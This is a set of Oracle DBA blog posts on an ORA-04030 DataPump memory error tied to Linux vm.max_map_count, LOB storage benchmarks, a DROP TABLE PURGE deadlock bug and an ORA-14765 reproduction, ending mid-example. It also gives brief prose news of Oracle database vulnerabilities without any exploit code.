impdp: ORA-04030: out of process memory when trying to allocate 4088 bytes (PLS CGA hp,pdzgM64_New_Link)

November 14th, 2014

Even on Oracle 11.2.0.4.x there still seems to be a problem with “ORA-04030: out of process memory when trying to allocate 4088 bytes (PLS CGA hp,pdzgM64_New_Link)”. I’ve just hit it during a DataPump import. The alert log shows something like this:

ORA-04030: out of process memory when trying to allocate 1052696 bytes (pga heap,log read buffer)
ORA-04030: out of process memory when trying to allocate 7438704 bytes (pga heap,kgh stack)
ORA-04030: out of process memory when trying to allocate 4088 bytes (PLS CGA hp,pdzgM64_New_Link)
Dumping diagnostic data in directory=[cdmp_20141106193106], requested by (instance=2, osid=4893 (DW00)), summary=[incident=240603]

Detailed incident trace shows:

mmap(offset=207282176, len=8192) failed with errno=12 for the file ora_dw00_DBSIDNAME3
[..]
*** 2014-11-06 19:48:31.300
OPIRIP: Uncaught error 27102. Error stack:
ORA-27102: out of memory
Linux-x86_64 Error: 12: Cannot allocate memory
Additional information: 108
Additional information: 4521984
ORA-00448: normal completion of background process
ORA-31671: Worker process DW00 had an unhandled exception.
ORA-04030: out of process memory when trying to allocate 16048 bytes (session heap,kuxLpxAlloc)
ORA-06512: at "SYS.KUPW$WORKER", line 1887

According to /usr/include/asm-generic/errno-base.h, errno 12 is exactly the ENOMEM error code. The mmap() man page says that ENOMEM means “No memory is available, or the process’s maximum number of mappings would have been exceeded.”
On Linux there is indeed a max_map_count limit, documented as follows:

The max_map_count file allows for the restriction of the number of VMAs (Virtual Memory Areas) that a particular process can own. A Virtual Memory Area is a contiguous area of virtual address space. These areas are created during the life of the process when the program attempts to memory map a file, links to a shared memory segment, or allocates heap space. Tuning this value limits the amount of these VMAs that a process can own. Limiting the amount of VMAs a process can own can lead to problematic application behavior because the system will return out of memory errors when a process reaches its VMA limit but can free up lowmem for other kernel uses. If your system is running low on memory in the NORMAL zone, then lowering this value will help free up memory for kernel use.

The check itself is simple (see do_mmap_pgoff() in http://lxr.free-electrons.com/source/mm/mmap.c) and appears to have been turned into a dynamic sysctl around the 2.6.5 kernels (https://www.kernel.org/pub/linux/kernel/people/akpm/patches/2.6/2.6.5-rc3/2.6.5-rc3-mm3/broken-out/max_map_count-sysctl.patch).

The simple workaround of increasing this value via sysctl works like a charm. The interesting fact is that the oracle-validated RPM does not change this value, although it could.
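
For reference, the check and the workaround boil down to something like the following shell snippet (the 262144 value is just an example, not a sizing recommendation, and <pid_of_DW00> is a placeholder for the affected worker process):

sysctl vm.max_map_count                                # current limit (the default is usually 65530)
wc -l /proc/<pid_of_DW00>/maps                         # rough count of mappings the worker already owns
sysctl -w vm.max_map_count=262144                      # temporary bump, lost on reboot
echo "vm.max_map_count = 262144" >> /etc/sysctl.conf   # persist the change
sysctl -p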

11.2.0.4.x, 12.1: Bug Alert 19384287 for function based indexes together with NVL()

August 17th, 2014

19384287 : WRONG NUMBER OF ROWS RETURNED ON FIRST EXECUTION

New exploits for recent Oracle DB releases…

June 22nd, 2014

An exploit, probably for CVE-2013-5858 (according to the Jan 2014 CPU’s Oracle Database Server Risk Matrix), has been revealed in the blog posts Is your database secure? Are you sure? Are you *really* sure? and Major Data Exploit Patched by January 2014′s CPU.

http://www.security-explorations.com/en/SE-2014-01-press.html – the internal Oracle RDBMS JRE is vulnerable and the CREATE SESSION privilege is enough (so with just an account, without even CREATE TABLE, one can take over DBA privileges); not fixed yet (just reported to Oracle), no workaround given yet. I think it is just a matter of time before someone reproduces this… :)

Part 5: Oracle SecureFile LOB is better than BasicFile, isn’t it?

May 9th, 2014

In this part I’ll try to discuss one of the biggest performance problems with BasicFile LOBs – enq: HW contention (a wait event that belongs to the “Configuration” class). It is often observed on systems doing concurrent INSERTs into BasicFile LOBs with data bigger than ~3960 bytes (or with LOBs having DISABLE STORAGE IN ROW); it is essentially a common name for everything related to space allocation (allocating/formatting the next extent for the LOBSEGMENT itself, or looking for free space and reclaiming it). More research typically ends up in reading the following engineering notes on Metalink:

  • LOB HWM CONTENTION :Using AWR Reports to Identify the Problem; Confirm and Verify the Fix (Doc ID 837883.1)
  • Bug 9801919 “enq: HW – contention” against segments that add an extent frequently during high concurrency
  • ‘enq HW – contention’ For Busy LOB Segment (Doc ID 740075.1)
  • BUG:4867884 LOB HW LOCK CONTENTION WITH SPACE RECLAIMATION
  • Bug 6376915 HW enqueue contention for ASSM LOB segments
  • Bug 7319120 HW contention for BasicFile LOBs – special workaround

Especially in the last one, Bug 7319120, the workaround is stated as “The preferred option for such contention on basicfile LOBs is to migrate the LOBS to Securefiles in RDBMS 11g or later. Securefile LOBs have been designed for better concurrency”, but as I’ve presented in earlier posts, it is not as beautiful as it sounds (huge problems shown in the previous posts with wasted space on SecureFiles on early 11.2.0.2.x releases and, surprisingly, the same on at least <= 11.2.0.4.2 as of this writing). Most of the remaining bugs are already fixed starting with 11.2.0.3.0, and as stated by Oracle, SecureFiles are “the way forward”.

To the best of my knowledge, typical solutions to “enq: HW – contention” usually include one of the following (a few hedged SQL sketches follow the list):

  1. properly setting the LOB cache vs nocache (default) option and tuning I/O – enq: HW for LOBs seems to be affected by storage performance, as will be shown later
  2. a proper (hash) partitioning scheme on the affected table/LOB to spread the contention
  3. altering the LOB chunk size (often increasing the default 8k to something like 16k/32k gives slightly better results – but this is very workload specific)
  4. setting event 44951
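
A few hedged SQL sketches of options 1–3 (the table and LOB column names are made up for illustration; option 4, the event, is shown further down in the section devoted to it):

-- 1. switch the LOB to CACHE (and tune the I/O feeding the LOB segment)
ALTER TABLE t_blob MODIFY LOB (data) (CACHE);

-- 2. spread the contention at creation time with hash partitioning
CREATE TABLE t_blob_part (
  id   NUMBER PRIMARY KEY,
  data BLOB
)
LOB (data) STORE AS BASICFILE (NOCACHE)
PARTITION BY HASH (id) PARTITIONS 8;

-- 3. a bigger CHUNK requires rebuilding the LOB segment
ALTER TABLE t_blob MOVE LOB (data) STORE AS (CHUNK 16384);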

Test env specification
Armed with that knowledge, I decided to really test this interesting event for my specific artificial workload. By this I mean version 11.2.0.3.8, BasicFile LOBs, NOCACHE, PCTVERSION 0, LOB sizes between 6000 and 10000 bytes, and 7 concurrent INSERT and DELETE jobs preceded by prefilling the LOBs and then DELETing them – to simulate non-ideal, non-clean conditions for a table (ab)used as a queue. The DB was in NOARCHIVELOG mode and flashback was disabled. The only difference from the earlier tests was the storage: RAID1 of just 2x SAS 15k RPM drives (shared between data and redo) instead of a ramdisk (I needed that I/O latency for enq: HW to become visible in the Top 5).
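
For reference, each worker job conceptually did something along these lines (a simplified single-worker sketch, not the actual harness; the table, sequence and size values are illustrative):

-- table (ab)used as a queue: BasicFile, NOCACHE, PCTVERSION 0, out-of-row LOBs
CREATE TABLE t_blob (
  id   NUMBER PRIMARY KEY,
  data BLOB
) LOB (data) STORE AS BASICFILE (DISABLE STORAGE IN ROW CHUNK 8192 PCTVERSION 0 NOCACHE);

CREATE SEQUENCE t_blob_seq CACHE 1000;

DECLARE
  v_payload RAW(10000);
BEGIN
  FOR i IN 1 .. 100000 LOOP
    -- LOB sizes between ~6000 and ~10000 bytes, as in the test
    v_payload := UTL_RAW.cast_to_raw(RPAD('x', 6000 + MOD(i * 997, 4000), 'x'));
    INSERT INTO t_blob (id, data) VALUES (t_blob_seq.NEXTVAL, TO_BLOB(v_payload));
    DELETE FROM t_blob WHERE id = t_blob_seq.CURRVAL - 16;  -- moving-window delete
    COMMIT;
  END LOOP;
END;
/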

HW contention root cause
The even more interesting fact is that an INSERT into the LOB (with the related LOB extent allocation) is masked by enq: HW contention which (when you look via V$WAIT_CHAINS) is actually waiting for “db file sequential read”:

CHAIN_SIGNATURE                                    WHO             WAIT_EVENT_TEXT              BLOCKED_BY              P1 P1_TEXT                 P2 P2_TEXT                 P3 P3_TEXT
-------------------------------------------------- --------------- ---------------------------- --------------- ---------- --------------- ---------- --------------- ---------- ---------------
'db file sequential read'<='enq: HW - contention'  129,571         enq: HW - contention         160,25          1213661190 name|mode                5 table space #     12583050 block
'db file sequential read'<='enq: HW - contention'  160,25          db file sequential read      ,                        3 file#                 4514 block#                   1 blocks
'db file sequential read'<='enq: HW - contention'  6,7             enq: HW - contention         160,25          1213661190 name|mode                5 table space #     12583050 block
'db file sequential read'<='enq: HW - contention'  33,9            enq: HW - contention         160,25          1213661190 name|mode                5 table space #     12583050 block
'db file sequential read'<='enq: HW - contention'  65,9            enq: HW - contention         160,25          1213661190 name|mode                5 table space #     12583050 block
'db file sequential read'<='enq: HW - contention'  190,13          enq: HW - contention         160,25          1213661190 name|mode                5 table space #     12583050 block
'db file sequential read'<='enq: HW - contention'  223,9           enq: HW - contention         160,25          1213661190 name|mode                5 table space #     12583050 block

In the above case six sessions were waiting on enq: HW contention (looking for free space for their INSERTs) for the 7th session (SID=160, serial#=25) – the one actually searching for/reclaiming the space – to finish, and that 7th session was doing a single-block (8kB) physical read. The Top 5 section looked similar to this:

ELAPSED
---------------------------------------------------------------------------
+000000000 00:24:54.463960000 

Top 5 Timed Foreground Events
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                                                           Avg
                                                          wait   % DB
Event                                 Waits     Time(s)   (ms)   time Wait Class
------------------------------ ------------ ----------- ------ ------ ----------
enq: HW - contention                 62,717         918     15   32.2 Configurat
direct path write                    93,156         277      3    9.7 User I/O
db file sequential read              64,995         199      3    7.0 User I/O
DB CPU                                               91           3.2
buffer busy waits                    26,578           1      0     .0 Concurrenc

and the statistics most useful for us (look at the physical direct writes for LOBs):

Statistic                                     Total     per Second     per Trans
-------------------------------- ------------------ -------------- -------------
[..]
lob reads                                    63,000          188.8           1.0
lob writes                                  315,000          943.7           5.0
lob writes unaligned                        314,990          943.7           5.0
physical read IO requests                    64,851          194.3           1.0
physical read bytes                     531,267,584    1,591,684.2       8,428.1
physical read total IO requests              65,656          196.7           1.0
physical read total bytes               544,384,000    1,630,981.2       8,636.2
physical read total multi block                   0            0.0           0.0
physical reads                               64,852          194.3           1.0
physical reads cache                            558            1.7           0.0
physical reads cache prefetch                     1            0.0           0.0
physical reads direct                        64,294          192.6           1.0
physical reads direct temporary                   0            0.0           0.0
physical write IO requests                  105,628          316.5           1.7
physical write bytes                  1,036,320,768    3,104,829.8      16,440.4
physical write total IO requests            170,303          510.2           2.7
physical write total bytes            1,339,469,824    4,013,068.1      21,249.6
physical write total multi block                 43            0.1           0.0
physical writes                             126,504          379.0           2.0
physical writes direct                      125,324          375.5           2.0
physical writes direct (lob)                125,316          375.5           2.0
physical writes from cache                    1,180            3.5           0.0
physical writes non checkpoint              126,504          379.0           2.0
[..]

Below are the data after changing the LOB to CACHE, which resulted in a drastic reduction of enq: HW contention (as the dependent I/O is faster because it is usually cached); V$WAIT_CHAINS now shows many wait chains like these, for example (notice the lack of “db file sequential read”):

  • 'log file parallel write'<='log buffer space'<='buffer busy waits'
  • 'log file parallel write'<='log buffer space'
  • 'enq: HW - contention'<='enq: HW - contention'

while the Top 5 shows a different picture (the main bottleneck has now moved to the redo subsystem):

ELAPSED
---------------------------------------------------------------------------
+000000000 00:06:29.795479000 

Top 5 Timed Foreground Events
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                                                           Avg
                                                          wait   % DB
Event                                 Waits     Time(s)   (ms)   time Wait Class
------------------------------ ------------ ----------- ------ ------ ----------
log buffer space                      1,542         116     75   15.6 Configurat
enq: HW - contention                 58,609         110      2   14.8 Configurat
buffer busy waits                   125,436          99      1   13.3 Concurrenc
DB CPU                                               91          12.3
log file switch (checkpoint in            6          10   1620    1.3 Configurat

and the corresponding statistics:

Statistic                                     Total     per Second     per Trans
-------------------------------- ------------------ -------------- -------------
[..]
lob reads                                    63,000          347.3           1.0
lob writes                                  315,009        1,736.4           5.0
physical read IO requests                       629            3.5           0.0
physical read bytes                       5,619,712       30,976.6          89.1
physical read total IO requests               1,629            9.0           0.0
physical read total bytes                21,804,032      120,186.7         345.8
physical read total multi block                   0            0.0           0.0
physical reads                                  686            3.8           0.0
physical reads cache                            661            3.6           0.0
physical reads cache prefetch                    57            0.3           0.0
physical reads direct                            25            0.1           0.0
physical reads direct temporary                   0            0.0           0.0
physical write IO requests                   16,462           90.7           0.3
physical write bytes                    234,405,888    1,292,076.2       3,718.0
physical write total IO requests             19,116          105.4           0.3
physical write total bytes            1,399,786,496    7,715,808.2      22,202.6
physical write total multi block              2,341           12.9           0.0
physical writes                              28,614          157.7           0.5
physical writes direct                           25            0.1           0.0
physical writes direct (lob)                      0            0.0           0.0
physical writes from cache                   28,589          157.6           0.5
physical writes non checkpoint               16,153           89.0           0.3
[..]

So in this case, changing to CACHE reduced the elapsed time of the 7 jobs from almost 25 minutes down to about 6.5 minutes. You might also notice a rather huge decrease in direct physical (random) writes, which is almost always an excellent result for most disk-based systems (those blocks will certainly be flushed out later by DBWR using much more optimized/sequential writes).

The mysterious event 44951
The mentioned event is described as “causes ASSM LOB space to batch up reclaim instead of just reclaiming the requested/required number of LOB chunks. To enable this fix, set event 44951 to the maximum number of chunks that you would like to have reclaimed per attempt. The maximum allowed is 1024. Anything larger becomes 1024. However, if the requested amount of space is larger than the event’s value, the reclaim will be for the requested amount of space.”
It is interesting that several years ago people complained when they migrated LOBs from MSSM to ASSM, and indeed in a different source we find: “With Manual Segment Space Management, this value cannot be altered and is fixed at 128.” Somewhere else it is written: “The fix for this problem introduces a *mandatory event* which must be set in order for the ASSM architectural change leading to more efficient allocation of LOB chunks during high load and transaction contention when Extent allocation is needed. The event is *not* set even after you apply the patch.”
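
For reference, the event is typically set like this (the level is the maximum number of chunks to reclaim per attempt; level 3 below is just the value that turned out best in my tests, not a general recommendation):

-- in the running instance, and in the spfile so it survives a restart
ALTER SYSTEM SET EVENTS '44951 TRACE NAME CONTEXT FOREVER, LEVEL 3';
ALTER SYSTEM SET EVENT = '44951 TRACE NAME CONTEXT FOREVER, LEVEL 3' SCOPE = SPFILE;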

So here are the results with NOCACHE LOB:

event 44951 not set:

ELAPSED
---------------------------------------------------------------------------
+000000000 00:21:57.406259000

Top 5 Timed Foreground Events
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                                                           Avg
                                                          wait   % DB
Event                                 Waits     Time(s)   (ms)   time Wait Class
------------------------------ ------------ ----------- ------ ------ ----------
enq: HW - contention                 62,591         787     13   39.3 Configurat
direct path write                    90,263         252      3   12.6 User I/O
db file sequential read              64,616         172      3    8.6 User I/O
DB CPU                                              111           5.6
buffer busy waits                    24,388           1      0     .0 Concurrenc

event 44951 set to 3:

ELAPSED
---------------------------------------------------------------------------
+000000000 00:18:33.058539000  

Top 5 Timed Foreground Events
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                                                           Avg
                                                          wait   % DB
Event                                 Waits     Time(s)   (ms)   time Wait Class
------------------------------ ------------ ----------- ------ ------ ----------
enq: HW - contention                 41,254         585     14   47.3 Configurat
direct path write                    86,039         285      3   23.0 User I/O
db file sequential read              43,801         144      3   11.6 User I/O
DB CPU                                               88           7.1
buffer busy waits                    39,976           1      0     .1 Concurrenc

event 44951 set to 16:

ELAPSED
---------------------------------------------------------------------------
+000000000 00:22:31.832235000   

Top 5 Timed Foreground Events
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                                                           Avg
                                                          wait   % DB
Event                                 Waits     Time(s)   (ms)   time Wait Class
------------------------------ ------------ ----------- ------ ------ ----------
direct path write                   107,809         911      8   34.9 User I/O
db file sequential read              12,804         185     14    7.1 User I/O
enq: HW - contention                  3,376         177     52    6.8 Configurat
DB CPU                                               81           3.1
log file switch (private stran            4           1    323     .0 Configurat

event 44951 set to 32:

ELAPSED
---------------------------------------------------------------------------
+000000000 00:49:27.268629000   

Top 5 Timed Foreground Events
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                                                           Avg
                                                          wait   % DB
Event                                 Waits     Time(s)   (ms)   time Wait Class
------------------------------ ------------ ----------- ------ ------ ----------
direct path write                   111,440       1,435     13   24.5 User I/O
enq: HW - contention                  2,597       1,027    395   17.5 Configurat
db file sequential read              20,339         429     21    7.3 User I/O
DB CPU                                               79           1.4
log file switch (private stran            5           2    474     .0 Configurat

event 44951 set to 512:

ELAPSED
---------------------------------------------------------------------------
+000000000 00:38:45.176198000   

Top 5 Timed Foreground Events
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                                                           Avg
                                                          wait   % DB
Event                                 Waits     Time(s)   (ms)   time Wait Class
------------------------------ ------------ ----------- ------ ------ ----------
direct path write                   116,908       1,833     16   40.2 User I/O
db file sequential read              17,262         354     20    7.8 User I/O
DB CPU                                               78           1.7
enq: HW - contention                     23          64   2802    1.4 Configurat
log file switch (private stran            6           3    473     .1 Configurat

So apparently the most interesting result (for LOB reclamation) is, in my case, the one with the event set to 3 (chunks). I could test more, but time for this research was the most limiting constraint. When the tablespace and LOB are created with defaults the chunk is 8kB, so in this case that means 8kB*3 = 24kB of I/O per reclamation. Apparently, the bigger the event level, the more I/O work for the potential reclamation is performed by the session requiring more space; all of this is hidden under enq: HW contention on the LOB segment, but hits *different sessions*. A CACHE LOB scenario with the event set to a properly tuned level would probably give an even better processing time.

SUMMARY
My conclusion is that having enq: HW contention in the single “Configuration” wait class visible in Grid/Cloud Control is a little bit unfortunate, because it may also be related to I/O (storage) performance, and it can even be affected by the current DB cache contents (which may or may not contain the LOBSEGMENT blocks required for the reclamation). The LRU cache is of course a function of time/workload, and the physical I/O from the DB itself might be served from a SAN cache.


Part 4: Oracle SecureFile LOB is better than BasicFile, isn’t it?

May 5th, 2014

In part 3 we showed that SecureFiles had much lower space usage (they reused space) on 11.2.0.3.8. I wanted to try the same workload on 11.2.0.4.2 (also on ramdisks, same number of concurrent jobs performing INSERTs and DELETEs, same amount of data/loop variables), and the results are, to put it mildly, VERY interesting:

(chart: space used by the LOB segments after the test, 11.2.0.3.8 vs 11.2.0.4.2)

Clearly there is some regression when it comes to the MB used afterwards (at the end of the test “SELECT count(1) FROM t_blob” returns just 21 rows, so you really shouldn’t have ~700MB lost). The collected AWR snapshots also reveal the absence on 11.2.0.4.2 of the high “buffer busy waits” for SecureFiles that were present on 11.2.0.3.8. The 11.2.0.3.8 AWR is below:

Top 5 Timed Foreground Events
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                                                           Avg
                                                          wait   % DB
Event                                 Waits     Time(s)   (ms)   time Wait Class
------------------------------ ------------ ----------- ------ ------ ----------
DB CPU                                              412          41.8
buffer busy waits                   415,575         299      1   30.4 Concurrenc
latch: cache buffers chains          39,045           2      0     .2 Concurrenc
latch free                            3,906           1      0     .1 Other
latch: enqueue hash chains            5,658           0      0     .0 Other

While the new/broken 11.2.0.4.2 stats are here:

Top 10 Foreground Events by Total Wait Time
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                                            Tota    Wait   % DB
Event                                 Waits Time Avg(ms)   time Wait Class
------------------------------ ------------ ---- ------- ------ ----------
DB CPU                                        59           85.9
enq: TX - contention                    198  2.3      11    3.3 Other
buffer busy waits                    22,290  1.4       0    2.0 Concurrenc
local write wait                        292    1       3    1.4 User I/O
latch: object queue header ope          734   .2       0     .3 Other
latch: cache buffers chains           4,161   .1       0     .2 Concurrenc

As mentioned before, I/O has been eliminated by using a ram disk (with filesystemio_options=NONE due to the lack of proper O_DIRECT support on tmpfs). The much lower CPU utilization (412s down to 59s) is very interesting, but as you can see it comes at a price. Even more interesting is the old BasicFile AWR report on 11.2.0.4.2:

Top 10 Foreground Events by Total Wait Time
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                                            Tota    Wait   % DB
Event                                 Waits Time Avg(ms)   time Wait Class
------------------------------ ------------ ---- ------- ------ ----------
DB CPU                                      34.8           94.4
log file switch (checkpoint in            6  1.7     275    4.5 Configurat
buffer busy waits                    18,247   .4       0    1.1 Concurrenc
latch: cache buffers chains           4,617   .1       0     .2 Concurrenc
log file switch completion               16   .1       4     .2 Configurat
enq: TX - index contention              246    0       0     .1 Concurrenc

as it shows that BasicFiles are cheaper on CPU for this particular workload when you completely eliminate I/O ;)

Part 3: Oracle SecureFile LOB is better than BasicFile, isn’t it?

April 24th, 2014

OK, so far in our previous parts/tests regarding Oracle LOBs we had:

  • part 1 – showing how SecureFiles were fairly superior to BasicFiles on DB version 11.2.0.3.5 in terms of space consumed and elapsed processing time when handling rather small rows (most of them stored inline)
  • part 2 – showing how buggy SecureFiles were as a new feature, and how much space they actually wasted (on the older 11.2.0.2.3 release)

Part 3 is going to focus on showing which is better for storing rows/LOBs that are too big to fit into the row/table segment (the ~3900-byte limit) and must technically be stored in a separate LOB segment. The environment is very similar to the one from Part 1: basically OLTP, 4 concurrent jobs doing INSERTs into a single non-partitioned table in a PL/SQL loop that does INSERT LOB + DELETE LOB with ID-16 (a moving window for each job); the DB version is 11.2.0.3.8, the LOB chunk size is 8k, the tablespace block size is also 8k, and the LOB is set to CACHE. The storage underneath the DB is a ram disk (tmpfs to be exact), the tablespace is dropped and recreated every time, and everything is automated, including AWR snapshot collection. The main difference is that now we are using much larger LOB sizes (over 4k, to be exact) *AND* we changed the workload to first prefill the table and LOB with garbage data and then delete it, without coalescing the LOB segment itself. The last point, as you will see, is critical, and reflects a typical usage pattern where data is removed (e.g. queues).

The results are below; first, elapsed time, BasicFile vs SecureFile:

Second, space efficiency:

As you can see, the overall performance benefit of BasicFiles comes at the cost of huge storage waste. The workload profile in this particular test run is also very different between SecureFiles and BasicFiles; the best illustration is the difference in the AWR Top 5 events for the workload generating LOBs between 6k and 12k:

(AWR Top 5 events comparison, BasicFile vs SecureFile)

Later analysis reveals that the majority of the “buffer busy waits” are spent on “free list” management itself. Armed with this knowledge (11.2.0.3.8, SecureFile LOBs, buffer busy waits, free lists) we can start looking for more information and quickly find some nice horror stories.

Summary:
At least on 11.2.0.3.8, SecureFile LOBs still do not work as fast as BasicFile ones, but they come with the added benefit of reusing space (much better than on some old PSUs, e.g. 11.2.0.2.3). One can hit extreme “buffer busy waits” on SecureFiles, which might require rebuilding the table with a hidden parameter. It is written that this is fixed in the 11.2.0.4.x releases. In Part 4 or Part 5 I’m going to see how 11.2.0.4.x behaves under an identical workload.

-J.

Bug/ORA-00060 deadlock during concurrent Drop Table (purge) and INSERT

March 24th, 2014

I’ve just found a rather new and not widely known bug during the analysis of a hang in a production system. The research ended up in a fully reproducible test case against the following Oracle versions on x86_64:

  • 11.2.0.3.8
  • 11.2.0.4.0
  • 12.1.0.1.0

First, let’s prepare the experimental schema to trigger this bug: we create the TRANS table and the CHILD one; the objective is to drop the CHILD table from the system to release space:

drop table trans CASCADE CONSTRAINTS purge;
drop table child CASCADE CONSTRAINTS purge;
drop sequence trans_seq;
drop sequence child_seq;

CREATE TABLE TRANS (
  ID NUMBER(10,0) NOT NULL PRIMARY KEY,
  CDATE DATE NOT NULL,
  TXT VARCHAR2(64)
) PARTITION BY RANGE (cdate) INTERVAL (NUMTOYMINTERVAL(1,'MONTH'))
(
   PARTITION p1 values LESS THAN (TO_DATE('01-NOV-2010','DD-MON-YYYY'))
);

CREATE TABLE CHILD (
  CHILD_ID NUMBER(10,0) NOT NULL PRIMARY KEY,
  TRANS_ID NUMBER(10,0) NOT NULL ENABLE,
  TXT VARCHAR2(64),
  CONSTRAINT "TRANS_ID_FK" FOREIGN KEY (TRANS_ID) REFERENCES TRANS (ID) ENABLE
);

create sequence trans_seq start with 1 increment by 1 cache 1000;
create sequence child_seq start with 269282 increment by 1 cache 1000;

create or replace procedure generate_load as
  i number;
begin
  for i in 1 .. 50000 loop
    insert into trans (id, cdate) values (trans_seq.nextval, to_date(trunc(sysdate-i)));
    commit write wait;
  end loop;
end;
/

exec generate_load;

-- load child with some vaules from parent (trans)
insert into child (child_id, trans_id) select child_seq.nextval, id from trans;
commit;

The trick is that CHILD has a referential constraint to the TRANS table. The additional trick is that there are several (3–4) concurrent sessions doing simple INSERTs into TRANS, each followed immediately by COMMIT WRITE WAIT, in a PL/SQL loop. OK, so let’s start our generator:

[oracle@t10050 fk_drop_table_locks]$ ./gen.sh
Mon Mar 24 14:44:50 CET 2014
Launching 3 workers with load.sql
...waiting to finish
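
gen.sh itself is not shown here; a minimal equivalent would be something like this (credentials, connect string and file names are placeholders):

#!/bin/bash
# fire 3 concurrent sqlplus workers, each running the generate_load procedure
date
echo "Launching 3 workers with load.sql"
for i in 1 2 3; do
  sqlplus -s dba1/secret@DBSID @load.sql &   # load.sql simply runs: exec generate_load;
done
echo "...waiting to finish"
wait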

Now, when we attempt to drop our CHILD table using the following (which is exactly what a production DBA performed some time ago in our case):

alter session set ddl_lock_timeout=15;
drop table child purge;

In the experiment the INSERT sessions end up throwing the famous ORA-00060 error:

BEGIN generate_load; END;
BEGIN generate_load; END;

*
*
ERROR at line 1:
ERROR at line 1:
ORA-00060: deadlock detected while waiting for resource
ORA-00060: deadlock detected while waiting for resource
ORA-06512: at "DBA1.GENERATE_LOAD", line 5
ORA-06512: at "DBA1.GENERATE_LOAD", line 5
ORA-06512: at line 1
ORA-06512: at line 1

Elapsed: 00:00:15.06
Elapsed: 00:00:15.06
BEGIN generate_load; END;

*
ERROR at line 1:
ORA-00060: deadlock detected while waiting for resource
ORA-06512: at "DBA1.GENERATE_LOAD", line 5
ORA-06512: at line 1

Elapsed: 00:00:15.10

Of course the alert log will be full of deadlock errors, and a sample single-session deadlock graph looks like this:

*** 2014-03-24 14:25:23.056
DEADLOCK DETECTED ( ORA-00060 )

[Transaction Deadlock]

The following deadlock is not an ORACLE error. It is a
deadlock due to user error in the design of an application
or from issuing incorrect ad-hoc SQL. The following
information may aid in determining the deadlock:

Deadlock graph:
                       ---------Blocker(s)--------  ---------Waiter(s)---------
Resource Name          process session holds waits  process session holds waits
TM-0000a079-00000000        20     138    SX             24       6           S
TM-0000a07c-00000000        24       6     X             20     138          SX

session 138: DID 0001-0014-00000BF2     session 6: DID 0001-0018-00000055
session 6: DID 0001-0018-00000055       session 138: DID 0001-0014-00000BF2 

Rows waited on:
  Session 138: obj - rowid = 0000A07C - AAAAAAAAAAAAAAAAAA
  (dictionary objn - 41084, file - 0, block - 0, slot - 0)
  Session 6: obj - rowid = 0000A079 - AAAAAAAAAAAAAAAAAA
  (dictionary objn - 41081, file - 0, block - 0, slot - 0)

From this we can say that the two sessions {138, 6} ended up competing for two TM enqueues, but in an incompatible way across the two tables. Session 138 was holding an SX (row-exclusive) lock on the TM enqueue for table 0000A079 (TRANS) – i.e. it was protecting the table in sub-exclusive mode because it wanted to insert – and in parallel session 6 was holding an X lock on the TM enqueue for table 0000A07C (CHILD) – i.e. it was holding exclusive access to the whole table, since it was the one trying to DROP it. In the next processing cycles:

  • session 6 (the one with DROP TABLE PURGE) tried to acquire a shared lock (S) on table TRANS due to the FK constraint, and started waiting for it (S and SX are not compatible according to the MetaLink note “Detecting and Resolving Locking Conflicts and Ora-00060 errors” (Doc ID 15476.1))
  • session 138 (the one doing the INSERT at the time) tried to acquire SX on the TM enqueue for table CHILD, but couldn’t get it, as CHILD had been eXclusively locked by session 6
  • within several seconds the automatic deadlock detection kicked in and killed the sessions performing the INSERTs, causing downtime/errors for the application

Upon further investigation together with my DBA coworker Andrzej Nowicki, and after some short trial and error today, we came to the conclusion that the main culprit of this error is the PURGE clause of the DROP TABLE statement. This has several interesting repercussions:

  • “DROP TABLE X PURGE” and “DROP TABLE X” are technically two different things, and only the PURGE variant actually triggers the bug.
  • The Oracle parameter responsible for the recycle bin affects whether “DROP TABLE X” effectively behaves like “DROP TABLE X PURGE”.
  • This case is very similar to Bug 11693365 “Concurrent Drop table and Select on Reference constraint table hangs (deadlock)”; however, that one is stated to be fixed in 12.1.0.1 (base release) and 11.2.0.3 (server patch set), whereas the bug described here is NOT.
  • The workarounds for bug 11693365 seem to also help here (“Disable and drop all the referential integrity constraints before dropping the child table.
    eg: alter table disable constraint ; / alter table drop constraint ; / drop table cascade constraints purge;”) – a sketch using this post’s tables follows below.
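
Applied to this post’s schema, that workaround would look roughly like this (a sketch only; the constraint name is the one created above):

-- drop the FK first, so the DROP TABLE no longer needs the S lock on TRANS
ALTER TABLE child DISABLE CONSTRAINT trans_id_fk;
ALTER TABLE child DROP CONSTRAINT trans_id_fk;
DROP TABLE child CASCADE CONSTRAINTS PURGE;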

ORA-14765: when CREATE INDEX ONLINE is not really online…

March 14th, 2014

Several days ago, in our production application, we hit an interesting and (to me at least) new Oracle error: “ORA-14765: Cannot create a partition while doing a create index”. It wouldn’t be strange if it hadn’t happened during a CREATE INDEX ONLINE operation; it therefore indicates that ONLINE index creation is not really an ONLINE operation (sic!).

Note1: you cannot test this in the SYS schema, as the deferred segment creation feature on partitioned tables does not seem to work for SYS (or the SYSTEM tablespace), which is dedicated to Oracle dictionary purposes only. It seems to me this is a similar story to the enhanced checksums always enabled for the SYSTEM tablespace (the hidden parameter _db_always_check_system_ts, which stands for “Always perform block check and checksum for System tablespace”), etc.

Note2: the key to getting the error is to have the parameter deferred_segment_creation set to TRUE, which is quite recommended if you want to avoid wasting space, since starting with 11.2 Oracle allocates a minimum 8MB initial extent per (sub)partition segment.

Note3: tested only on 11.2.0.3.6 and 11.2.0.3.8.
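
Before trying to reproduce it, it is worth confirming that deferred segment creation is actually enabled (it defaults to TRUE on 11.2, but a quick check does not hurt):

show parameter deferred_segment_creation
-- if needed (it is a dynamic parameter):
alter system set deferred_segment_creation = true;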

After a little playing around, here are the steps to reproduce it:

DBA1@test3> create table t1 (
    id number primary key,
    ts	TIMESTAMP,
    txt varchar2(64)
) partition by range (ts)  interval (NUMTOYMINTERVAL(1, 'MONTH'))
(
  partition p1 values less than (TO_DATE('01.01.2000', 'DD.MM.YYYY')),
  partition p2000_02 values less than (TO_DATE('01.02.2000', 'DD.MM.YYYY')),
